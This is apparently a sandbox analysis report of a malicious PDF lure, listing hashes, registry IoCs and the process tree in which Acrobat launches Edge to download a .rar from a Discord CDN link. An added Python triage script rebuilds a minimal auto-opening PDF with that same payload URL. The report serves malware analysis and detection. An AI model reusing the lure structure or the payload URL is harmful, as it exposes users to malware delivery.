Resubmissions

Submitted          Analysis ID          Score
08-04-2022 08:16   220408-j6ez3sffgr    3
07-04-2022 11:36   220407-nqzf1afeb8    6
07-04-2022 11:31   220407-nm4asacchn    3

Analysis
- max time kernel: 148s
- max time network: 152s
- platform: windows10-2004_x64
- resource: win10v2004-20220331-en
- submitted: 07-04-2022 11:36
Behavioral tasks

Task          Sample             Resource
behavioral1   TT copy (3).pdf    win7-20220331-en
behavioral2   TT copy (3).pdf    win10v2004-20220331-en
General

- Target: TT copy (3).pdf
- Size: 84KB
- MD5: 29cee601ffd40bcbdded7b6b1ecb59c5
- SHA1: 57551f4ba5b1da74f4d1890fe1ec25b4046e8d96
- SHA256: ec2917bf44eeb0bed1da25d1c37e7051f8b00916cb4606e7dad01a8fef691ee4
- SHA512: 8b6b77627f6b13eeaeb058640628c2583847dece5f565da9d1aea2c54210ea655d68aaa20fc44ea44ac17b1ba46fd73ffb84cbc157af28f9d025f82b75ae73c1
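The behaviour the rest of this report documents is a PDF that, once opened in Acrobat Reader, hands a remote URL (a .rar on cdn.discordapp.com) to the browser. Before detonating a sample like this, an analyst normally pulls the link out of the file statically. The following is an added example, not code from the report or its vendor: it scans a PDF's raw bytes (and any FlateDecode streams it can inflate) for /URI actions and for the /OpenAction hook that fires them on open. The SAMPLE_PDF is constructed here to stand in for "TT copy (3).pdf", whose internals are not on this page; the only thing taken from the report is the URL Edge was launched with.

```python
"""Static triage of a PDF lure: pull /URI actions (and the /OpenAction hook that
fires them on open) out of the raw bytes, including actions hidden inside
FlateDecode streams.

Added example; not code from the sandbox report or its vendor. SAMPLE_PDF is
constructed here to stand in for "TT copy (3).pdf" (the real file's internals
are not on the report page); the URL is the one the report shows Edge being
launched with.
"""
import re
import zlib
from urllib.parse import urlparse

# Constructed minimal PDF: a full-page Link annotation and an /OpenAction both
# pointing at the same /URI action, so the browser opens as soon as the page loads.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R] >> endobj\n"
    b"4 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 612 792] /A 5 0 R >> endobj\n"
    b"5 0 obj << /S /URI /URI (https://cdn.discordapp.com/attachments/"
    b"958958106811977752/961145090439512094/tt-copy.rar) >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

URI_LITERAL = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)", re.S)   # /URI (literal string)
URI_HEX = re.compile(rb"/URI\s*<([0-9A-Fa-f\s]*)>")                 # /URI <hex string>
STREAM = re.compile(rb"stream\r?\n(.*?)endstream", re.S)
ARCHIVE_EXT = (".rar", ".zip", ".7z", ".iso", ".img")


def _inflate(blob: bytes):
    """Inflate one stream body; None if it is not a complete zlib stream."""
    d = zlib.decompressobj()
    try:
        out = d.decompress(blob)
    except zlib.error:
        return None
    return out if d.eof else None   # the EOL before 'endstream' ends up in unused_data


def _unescape(literal: bytes) -> bytes:
    """Undo the backslash escapes PDF allows inside ( ) strings for ( ) and the backslash."""
    return re.sub(rb"\\([()\\])", rb"\1", literal)


def extract_uris(data: bytes) -> list:
    """All /URI targets in the file, scanning the raw bytes and every inflatable stream."""
    views = [data] + [v for v in (_inflate(m.group(1)) for m in STREAM.finditer(data)) if v]
    found = set()
    for view in views:
        for m in URI_LITERAL.finditer(view):
            found.add(_unescape(m.group(1)).decode("latin-1"))
        for m in URI_HEX.finditer(view):
            found.add(bytes.fromhex(re.sub(rb"\s", b"", m.group(1)).decode()).decode("latin-1"))
    return sorted(found)


def triage(data: bytes) -> dict:
    """What an analyst wants before detonation: auto-run hook, hosts, archive-looking paths."""
    uris = []
    for u in extract_uris(data):
        p = urlparse(u)
        uris.append({"url": u, "host": p.hostname, "archive": p.path.lower().endswith(ARCHIVE_EXT)})
    return {"open_action": b"/OpenAction" in data, "uris": uris}


def make_compressed_pdf(url: str) -> bytes:
    """Constructed variant where the action sits in a FlateDecode stream, which a
    plain strings-style scan of the file would miss."""
    body = zlib.compress(b"6 0 obj << /S /URI /URI (" + url.encode() + b") >> endobj")
    return (b"%PDF-1.5\n7 0 obj << /Type /ObjStm /Filter /FlateDecode /Length "
            + str(len(body)).encode() + b" >>\nstream\n" + body + b"\nendstream\nendobj\n%%EOF\n")


if __name__ == "__main__":
    print(triage(SAMPLE_PDF))
    print(triage(make_compressed_pdf("https://example.invalid/payload.zip")))
```

The scan is deliberately byte-level rather than a full PDF object parser: it is meant as the first thirty seconds of triage, and a lure that wraps the action in an object stream is caught by inflating streams before re-scanning. Other action types a PDF can use to start a process (/Launch, /JavaScript) are not covered here; a hit on /OpenAction pointing at any action is the thing to chase.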
Malware Config
Signatures
-
Adds Run key to start application (2 TTPs, 1 IoC)
Processes:
  Description   IoC                                                                                                          Process
  Key created   \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000\Software\Microsoft\Windows\CurrentVersion\Run   msedge.exe
  The process credited here is msedge.exe, the browser the PDF's link launched, not a payload dropped by the sample; the report records a key creation only, no value written under it.
-
Drops file in Program Files directory (2 IoCs)
Processes:
  Description                    IoC                                                                                                   Process
  File created                   C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\b636dc00-35eb-4fec-87ab-78b640b69348.tmp   setup.exe
  File opened for modification   C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220407133746.pma                       setup.exe
  setup.exe is Edge's own installer (see its --configure-user-settings command line in the process tree) writing its metrics files; nothing from the sample is written under Program Files.
-
Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  Description         IoC                                                                 Process
  Key opened          \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0       AcroRd32.exe
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz   AcroRd32.exe
  Both reads are by AcroRd32.exe itself, not by code introduced by the PDF, so on their own they do not show the sample fingerprinting the sandbox.
-
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
  Description         IoC                                                                   Process
  Key opened          \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                      msedge.exe
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer   msedge.exe
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName    msedge.exe
-
Modifies Internet Explorer settings (1 IoC)
Processes:
  Description   IoC                                                                                                                                           Process
  Key created   \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION   AcroRd32.exe
-
Modifies registry class (8 IoCs)
Processes:
  Description   IoC                                                                                          Process        Rows
  Key created   \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000_Classes\Local Settings             msedge.exe     1
  Key created   \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000_Classes\Local Settings             OpenWith.exe   6
  Key created   \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\        msedge.exe     1
-
Suspicious behavior: EnumeratesProcesses (32 IoCs)
Processes:
  PID    Process               Rows
  3576   msedge.exe            2
  4612   msedge.exe            2
  2152   AcroRd32.exe          18
  3148   msedge.exe            2
  4672   msedge.exe            2
  5412   identity_helper.exe   2
  5528   msedge.exe            4
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (6 IoCs)
Processes:
  PID    Process      Rows
  4612   msedge.exe   6
-
Suspicious use of FindShellTrayWindow (19 IoCs)
Processes:
  PID    Process        Rows
  2152   AcroRd32.exe   1
  4612   msedge.exe     18
-
Suspicious use of SetWindowsHookEx (16 IoCs)
Processes:
  PID    Process        Rows
  2152   AcroRd32.exe   7
  1860   AdobeARM.exe   1
  2440   OpenWith.exe   1
  1588   OpenWith.exe   1
  4604   OpenWith.exe   1
  5208   OpenWith.exe   1
  5088   OpenWith.exe   1
  5504   OpenWith.exe   3
-
Suspicious use of WriteProcessMemory (64 IoCs)
Processes:
  Source PID   Source         Target PID   Target       Rows
  2152         AcroRd32.exe   4268         RdrCEF.exe   3
  2152         AcroRd32.exe   3112         RdrCEF.exe   3
  2152         AcroRd32.exe   4612         msedge.exe   2
  4612         msedge.exe     4648         msedge.exe   2
  4268         RdrCEF.exe     32           RdrCEF.exe   41
  4268         RdrCEF.exe     208          RdrCEF.exe   13
  Every write goes from a parent into a child it has just spawned (the CEF/Chromium child-process startup pattern seen under both RdrCEF.exe and msedge.exe); none targets an unrelated process. The row worth noting is 2152 -> 4612: Acrobat Reader starting Edge.
Processes (indentation shows depth in the process tree)

[1] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe (PID 2152)
    cmd: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\TT copy (3).pdf"
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    [2] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 4268)
        cmd: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        - Suspicious use of WriteProcessMemory

        [3] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 32)
            cmd: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=84052A6AD70ABBB895F46EFE3245F266 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

        [3] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 208)
            cmd: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=B8789043D0D5863280F197B66404F5F7 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=B8789043D0D5863280F197B66404F5F7 --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:1

        [3] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 3140)
            cmd: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=233354DAA414ECBE4AAFBE8B00729A0A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=233354DAA414ECBE4AAFBE8B00729A0A --renderer-client-id=4 --mojo-platform-channel-handle=2164 --allow-no-sandbox-job /prefetch:1

        [3] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 3540)
            cmd: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A133BA5535E15D0E772157B9588CFC01 --mojo-platform-channel-handle=2432 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

        [3] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 1140)
            cmd: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3738A1CD97B866D40BB6B2524A824A8D --mojo-platform-channel-handle=2684 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

        [3] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 4908)
            cmd: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E4B9D70B92AFDFAB2EF246064F7BDB71 --mojo-platform-channel-handle=1960 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

    [2] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 3112)
        cmd: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

    [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4612)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/958958106811977752/961145090439512094/tt-copy.rar
        - Adds Run key to start application
        - Enumerates system info in registry
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4648)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8a11946f8,0x7ff8a1194708,0x7ff8a1194718

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1852)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3576)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
            - Suspicious behavior: EnumeratesProcesses

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3688)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:8

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1772)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4344)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3236)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:1

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3152)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4620)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2184)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6076 /prefetch:8

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4156)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6220 /prefetch:8

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4824)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3728 /prefetch:8

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1604)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4672)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4216 /prefetch:8
            - Suspicious behavior: EnumeratesProcesses

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3148)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
            - Suspicious behavior: EnumeratesProcesses

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 3148)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6880 /prefetch:8

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe (PID 1420)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
            - Drops file in Program Files directory

            [4] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe (PID 5176)
                cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff6d27f5460,0x7ff6d27f5470,0x7ff6d27f5480

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 5412)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6880 /prefetch:8
            - Suspicious behavior: EnumeratesProcesses

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5528)
